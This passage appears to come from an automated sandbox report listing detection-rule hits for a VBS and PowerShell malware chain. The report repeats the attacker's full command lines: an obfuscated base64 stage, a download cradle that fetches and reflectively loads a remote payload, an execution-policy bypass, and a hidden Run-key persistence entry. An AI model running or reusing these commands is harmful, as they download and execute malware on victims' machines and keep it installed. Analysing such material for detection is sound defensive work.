Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\soste
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1120
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7280, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , ProcessId: 7476, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\soste
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7280, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , ProcessId: 7476, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine|base64offset|contains: I~%, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6644, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, ProcessId: 6192, ProcessName: powershell.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 4268, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine|base64offset|contains: I~%, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6644, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, ProcessId: 6192, ProcessName: powershell.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6644, TargetFilename: C:\Users\user\AppData\Local\Temp\xx2.vbs
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1120
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1120
                Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1120
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 4268, ProcessName: wscript.exe
